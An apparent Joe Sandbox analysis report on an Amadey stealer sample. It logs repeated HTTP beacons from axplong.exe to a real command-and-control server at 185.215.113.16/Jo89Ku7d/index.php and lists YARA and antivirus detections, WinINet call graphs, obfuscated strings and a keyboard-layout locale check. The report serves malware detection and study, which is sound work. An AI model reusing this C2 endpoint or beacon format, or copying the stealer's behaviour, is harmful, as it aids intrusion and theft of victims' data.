                      Jul 26, 2024 13:44:50.146931887 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:50.147691965 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:50.400048018 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      39 | 192.168.2.5 | 53686 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:50.516756058 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:51.277060032 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:51.277800083 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:51.527635098 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      40 | 192.168.2.5 | 53687 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:51.640239000 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:52.413220882 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:52.415894032 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:52.675721884 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      41 | 192.168.2.5 | 53688 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:52.797126055 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:53.648627043 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:53.649533033 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:53.899780035 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      42 | 192.168.2.5 | 53689 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:54.031814098 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:54.834448099 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:54.835484982 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:55.089221001 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      43 | 192.168.2.5 | 53690 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:55.202594042 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:55.991609097 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:55.992436886 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:56.243362904 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      44 | 192.168.2.5 | 53691 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:56.359525919 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:57.111125946 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:57.127521038 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:57.378264904 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      45 | 192.168.2.5 | 53692 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:57.498933077 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:58.280455112 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:58.283097982 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:58.617841959 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      46 | 192.168.2.5 | 53693 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:59.146281958 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:59.912614107 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Target ID:0
                      Start time:07:42:53
                      Start date:26/07/2024
                      Path:C:\Users\user\Desktop\EXyAlLKIck.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\EXyAlLKIck.exe"
                      Imagebase:0x750000
                      File size:1'878'528 bytes
                      MD5 hash:FDDCF49860999A5147F34179C07C4BC6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.2014529476.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2054954455.0000000000751000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:07:42:56
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Imagebase:0x6a0000
                      File size:1'878'528 bytes
                      MD5 hash:FDDCF49860999A5147F34179C07C4BC6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.2085097235.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.2044771326.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low
                      Has exited:true

                      Target ID:3
                      Start time:07:42:56
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                      Imagebase:0x6a0000
                      File size:1'878'528 bytes
                      MD5 hash:FDDCF49860999A5147F34179C07C4BC6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.2045418136.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.2085839344.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:07:44:00
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Imagebase:0x6a0000
                      File size:1'878'528 bytes
                      MD5 hash:FDDCF49860999A5147F34179C07C4BC6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000003.2671343641.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

                        Execution Graph

                        Execution Coverage:7.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:7.3%
                        Total number of Nodes:606
                        Total number of Limit Nodes:41

                        Control-flow Graph

                        APIs
                        • InternetOpenW.WININET(006F8D70,00000000,00000000,00000000,00000000), ref: 006ABDED
                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 006ABE11
                        • HttpOpenRequestA.WININET(?,00000000), ref: 006ABE5B
                        • HttpSendRequestA.WININET(?,00000000), ref: 006ABF1B
                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 006ABFCD
                        • InternetCloseHandle.WININET(?), ref: 006AC0A7
                        • InternetCloseHandle.WININET(?), ref: 006AC0AF
                        • InternetCloseHandle.WININET(?), ref: 006AC0B7
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Similarity
                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                        • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4p$invalid stoi argument$stoi argument out of range
                        • API String ID: 688256393-4154584363
                        • Opcode ID: 36f7fce50c457029579808f5818b73826cfb54f0601079d47db6fe9429690271
                        • Instruction ID: d7f05264d76ada47f6b8a6a4828dc58e79c2e1532d40b275903005672b89c27f
                        • Opcode Fuzzy Hash: 36f7fce50c457029579808f5818b73826cfb54f0601079d47db6fe9429690271
                        • Instruction Fuzzy Hash: 58B1E5B16001189BEB24DF28CC84BEDBB6AEF46314F5041ADF50897282D7759EC0CF98

                        Control-flow Graph

                        APIs
                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 006A6650
                        Similarity
                        • API ID: AccountLookupName
                        • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                        • API String ID: 1484870144-3856690409
                        • Opcode ID: 21d664e3fb48b7480db445c5c097e27d48d1aef4c18351ee5e25ee89af8c1ee5
                        • Instruction ID: d53627b5817c07ffeea761897cc8be401c70038110a3b7b1dd963fcc4d4c0271
                        • Opcode Fuzzy Hash: 21d664e3fb48b7480db445c5c097e27d48d1aef4c18351ee5e25ee89af8c1ee5
                        • Instruction Fuzzy Hash: 7991A5B19001189BDB28EB24CC85BEDB77AEB45304F4445EDF51997282DA349FC4CFA9
                        APIs
                          • Part of subcall function 006B7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 006B795C
                          • Part of subcall function 006B7870: __Cnd_destroy_in_situ.LIBCPMT ref: 006B7968
                          • Part of subcall function 006B7870: __Mtx_destroy_in_situ.LIBCPMT ref: 006B7971
                          • Part of subcall function 006ABD60: InternetOpenW.WININET(006F8D70,00000000,00000000,00000000,00000000), ref: 006ABDED
                          • Part of subcall function 006ABD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 006ABE11
                          • Part of subcall function 006ABD60: HttpOpenRequestA.WININET(?,00000000), ref: 006ABE5B
                        • std::_Xinvalid_argument.LIBCPMT ref: 006B4EA2
                        Similarity
                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                        • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-p
                        • API String ID: 2414744145-741609160
                        • Opcode ID: 43cecadd845cdc378fb50b7270f078032d9fca0bf43d0fe33dbdedf9dff0298b
                        • Instruction ID: 95397138c0509205f5b454465be6c17bc3c5b88e24b1e2b8d8d24a1d04ada0e0
                        • Opcode Fuzzy Hash: 43cecadd845cdc378fb50b7270f078032d9fca0bf43d0fe33dbdedf9dff0298b
                        • Instruction Fuzzy Hash: B523F3B1A001589BEB19DB28CD897DDBB779B81304F5481DCE009AB2C6EB399FC48F55

                        Control-flow Graph
                        • Function 6a5df0; API calls in graph: RegOpenKeyExA, RegEnumValueW
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                        • API String ID: 0-3963862150
                        • Opcode ID: 866f9671e303e57425a6b540378b7dd8103258a20d588aa890688551c34f45ca
                        • Instruction ID: 8ee4eda84714444a4204f14bac3a34fdd9a291478101c6213516a5aa98929375
                        • Opcode Fuzzy Hash: 866f9671e303e57425a6b540378b7dd8103258a20d588aa890688551c34f45ca
